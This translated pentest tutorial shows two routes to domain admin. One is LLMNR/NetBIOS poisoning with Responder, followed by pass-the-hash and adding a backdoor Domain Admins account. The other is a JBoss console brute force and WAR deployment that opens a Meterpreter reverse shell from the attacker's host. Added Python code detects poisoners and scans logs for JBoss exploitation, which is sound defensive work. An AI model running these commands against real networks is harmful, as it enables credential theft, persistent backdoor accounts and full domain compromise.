5 Common Ways to Get Internal-Network Domain Admin

Published: 2013-12-07 14:48 Source: wooyun Author: spiderlabs

1. NetBIOS and LLMNR Name Poisoning

This method is very useful when penetrating a Windows workgroup. Windows resolves a name in three steps: the local hosts file (%windir%\System32\drivers\etc\hosts), the DNS server, and finally a NetBIOS broadcast. If the first two lookups fail, a NetBIOS broadcast request is sent on the local network, and any system on that network can answer it. With SpiderLabs' Responder tool you can answer these requests without resorting to ARP spoofing. Metasploit can also do this (http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html), but in real-world testing Responder works better; it is written purely against the Python standard library, so it is convenient to run on a target :)

~/Responder# python Responder.py -i 192.168.8.25
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF

LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.12. The requested name was : 110.
…snip…

NBT-NS Answer sent to: 192.168.8.6
[+]SMB-NTLMv2 hash captured from : 192.168.8.6
Domain is : BEACONHILLSHIGH
User is : smccall
[+]SMB complete hash is : smccall::BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ECONOMY309\IPC$
…snip…

LLMNR poisoned answer sent to this IP: 192.168.8.11. The requested name was : wpad.
[+]SMB-NTLMv2 hash captured from : 192.168.8.11
Domain is : BEACONHILLSHIGH
User is : lmartin
[+]SMB complete hash is : lmartin:: BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ADVCHEM\311IPC$
…snip…

The LM, NTLMv1 or NTLMv2 hashes captured here can be brute-forced with a GPU or rainbow tables. If a domain administrator account is captured during the Responder session, winexe can be used directly to run cmd.exe:

~/work/nmap# ~/SpiderLabs/winexe-PTH -U BEACONHILLSHIGH\\smccall%allison --uninstall --system //192.168.8.6 cmd.exe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.
C:\WINDOWS\system32> net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.
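From the defender's side, the poisoner in the session above can be spotted on the segment by asking for a name that cannot exist and watching who answers: a normal host only replies to LLMNR queries for its own name, so any reply to a random canary comes from something like Responder. The following Python does that for LLMNR (UDP 5355, multicast 224.0.0.252) by building the query, sending a random canary name and parsing any answer. This is an added example, not code from the original post or from SpiderLabs; the canary label format and the two-second listening window are my own choices.

```python
import os
import socket
import struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # LLMNR multicast group and port (RFC 4795)

def build_llmnr_query(name, txid):
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # id, flags=0 (query), QDCOUNT=1
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN

def _skip_name(data, pos):  # step past a 2-byte compression pointer or 0-terminated labels
    if data[pos] & 0xC0 == 0xC0:
        return pos + 2
    while data[pos]:
        pos += 1 + data[pos]
    return pos + 1

def parse_llmnr_answers(data, expect_txid):
    # Return the IPv4 addresses in an LLMNR response to our transaction id, else []
    try:
        txid, flags, qdcount, ancount = struct.unpack("!HHHH", data[:8])
        if txid != expect_txid or not flags & 0x8000:  # QR bit set means "response"
            return []
        pos, ips = 12, []
        for _ in range(qdcount):  # skip the echoed question (name + QTYPE + QCLASS)
            pos = _skip_name(data, pos) + 4
        for _ in range(ancount):
            pos = _skip_name(data, pos)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
            pos += 10
            if rtype == 1 and rdlen == 4:  # A record
                ips.append(socket.inet_ntoa(data[pos:pos + 4]))
            pos += rdlen
        return ips
    except (struct.error, IndexError):  # truncated or malformed packet
        return []

def probe_for_poisoner(timeout=2.0):
    # A random label cannot legitimately resolve, so any answer comes from a poisoner
    name, txid = "canary-" + os.urandom(5).hex(), int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:  # collect every answer until the listening window closes
            data, (src, _) = sock.recvfrom(2048)
            hits += [(src, name, ip) for ip in parse_llmnr_answers(data, txid)]
    except socket.timeout:
        return hits  # list of (answering host, canary name, address it claimed)
```

Run `probe_for_poisoner()` from a host on the segment; an empty list after the timeout means nothing claimed the canary, while any entry names a host answering for a name that should not resolve.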

2. Exploiting JBoss vulnerabilities

You can first scan ports with nmap to identify common Java application servers, then exploit them with Metasploit's auxiliary modules, JBoss vulnerabilities for example. The most common problem is weak passwords; in the same way you can look for other Java-based application servers such as WebLogic, WebSphere and Tomcat, and also Apusic, which Chinese government departments have deployed a lot recently (pay attention to the WAR package format: once in the admin console, just deploy the WAR directly). Besides weak passwords, JBoss also has an admin-console authentication bypass and the long-circulated "1337" one. The following example shows how to brute-force the JBoss console with Metasploit and then deploy a WAR package.

msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E >> http.jboss.8080
~/work/nmap# cat http.jboss.8080 <-- this is the 25-thread dictionary scan of the JBoss console on port 8080
[*] Initializing modules...
THREADS => 25
RHOSTS => file:./8080
DICTIONARY => ./http.scan.list
RPORT => 8080
[*] Detecting error code
[*] Detecting error code
[*] Detecting error code
[*] Detecting error code
[*] Using code '404' as not found for 192.168.5.18
[*] Using code '404' as not found for 192.168.5.21
[*] Using code '404' as not found for 192.168.5.20
[*] Found http://192.168.5.20:8080/web-console/ 401 (192.168.5.20)
[*] http://192.168.5.20:8080/web-console/ requires authentication: Basic realm="JBoss JMX Console"
[*] Found http://192.168.5.20:8080/web-console/ 404 (192.168.5.20)
[*] Found http://192.168.5.20:8080/jmx-console/ 401 (192.168.5.20)
[*] http://192.168.5.20:8080/jmx-console/ requires authentication: Basic realm="JBoss JMX Console"
[*] Found http://192.168.5.21:8080/jmx-console/ 404 (192.168.5.21)
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed

Output from use auxiliary/scanner/http/jboss_vulnscan:
[*] 192.168.5.20:8080 /jmx-console/HtmlAdaptor requires authentication (401): Basic realm="JBoss JMX Console"
[*] 192.168.5.20:8080 Check for verb tampering (HEAD)
[+] 192.168.5.20:8080 Got authentication bypass via HTTP verb tampering
[+] 192.168.5.20:8080 Authenticated using admin:admin
[+] 192.168.5.20:8080 /status does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/ServerInfo.jsp does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/Invoker does not require authentication (200)
[+] 192.168.5.20:8080 /invoker/JMXInvokerServlet does not require authentication (200)

Output from use exploit/multi/http/jboss_maindeployer: <-- deploying the WAR package
msf exploit(jboss_maindeployer) > exploit

[*] Started reverse handler on 192.168.5.233:4444
[*] Sorry, automatic target detection doesn't work with HEAD requests
[*] Automatically selected target "Java Universal"
[*] Starting up our web service on http://192.168.5.233:1337/HlusdqEcokvXH.war ...
[*] Using URL: http:// 192.168.5.233:1337/HlveuqEzrovXH.war
[*] Asking the JBoss server to deploy (via MainDeployer) http://192.168.5.233:1337/HlusdqEcokvXH.war [*] Sending the WAR archive to the server...
[*] Sending the WAR archive to the server...
[*] Waiting for the server to request the WAR archive....
[*] Shutting down the web service...
[*] Executing HlusdqEcokvXH...
[+] Successfully triggered payload at '/HlusdqEcokvXH/ewNYTEdFnYdcaOl.jsp'
[*] Undeploying HlusdqEcokvXH...
[*] Sending stage (30355 bytes) to 192.168.5.159
[*] Meterpreter session 1 opened (192.168.5.233:4444 -> 192.168.5.20:4209) at 2013-09-15 19:00:06 -0600

meterpreter > sysinfo
Computer : BHHSMOFF011
OS : Windows 2003 5.2 (x86)
Meterpreter : java/java

meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\DELLBAC\EJBContainer\bin>whoami
whoami
beaconhillshigh\backup_admin

C:\>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.

The command completed successfully.

C:\>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.

The command completed successfully.
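As an added defensive example (not from the original post or from SpiderLabs), the following Python checks a JBoss/Tomcat access log for the two conditions the jboss_vulnscan output above reports: a verb other than GET or POST (such as HEAD) getting a 200 from the JMX or web console, which the stock security-constraint did not cover because it listed only GET and POST (removing those http-method entries from the console's web.xml makes the constraint apply to every verb), and 200 responses from the invoker servlets, which should never be reachable without a login. The log lines are constructed to mirror the scan-and-deploy sequence above; the regex, path lists and labels are my own assumptions.

```python
import re
from collections import Counter

# Tomcat/JBoss AccessLogValve "common" pattern: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Consoles and invokers the scan above found; each must sit behind authentication or be removed
SENSITIVE = ("/jmx-console", "/web-console", "/invoker/JMXInvokerServlet")
INVOKERS = ("/invoker/JMXInvokerServlet", "/web-console/Invoker")
EXPECTED_VERBS = {"GET", "POST"}  # the only verbs the stock security-constraint covered

def classify(match):
    # Label one parsed request, or return None when it is not a finding
    path = match.group("path").split("?")[0]
    if not path.startswith(SENSITIVE) or match.group("status") != "200":
        return None  # 401/403/404 on these paths is the expected outcome
    if match.group("method") not in EXPECTED_VERBS:
        return "verb-tampering"  # e.g. HEAD slipped past a GET/POST-only constraint
    if path.startswith(INVOKERS):
        return "unauthenticated-invoker"  # MBean invocation endpoint answered with 200
    return None

def scan(lines):
    # Return (source_ip, method, path, label) for every suspicious request in the log
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        label = classify(m) if m else None
        if label:
            findings.append((m.group("ip"), m.group("method"),
                             m.group("path").split("?")[0], label))
    return findings

def by_source(findings):
    # Count findings per source address to surface the noisiest client
    return Counter(ip for ip, _m, _p, _l in findings)

# Constructed sample log lines modelled on the scan and deploy sequence shown above
SAMPLE_LOG = [
    '192.168.5.233 - - [15/Sep/2013:18:58:40 -0600] "GET /jmx-console/HtmlAdaptor HTTP/1.1" 401 1234',
    '192.168.5.233 - - [15/Sep/2013:18:58:41 -0600] "HEAD /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:service=MainDeployer HTTP/1.1" 200 -',
    '192.168.5.233 - - [15/Sep/2013:18:59:02 -0600] "GET /web-console/Invoker HTTP/1.1" 200 512',
    '192.168.5.233 - - [15/Sep/2013:18:59:03 -0600] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 78',
    '192.168.5.50 - - [15/Sep/2013:19:00:01 -0600] "GET /status HTTP/1.1" 200 2048',
    '10.0.0.7 - - [15/Sep/2013:19:00:04 -0600] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 0',
]
```

A single source producing a HEAD bypass followed by invoker hits, as in the sample, is the pattern to alert on; a lone POST to HtmlAdaptor with 200 is what a legitimately authenticated admin also produces, so it is not flagged on its own.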
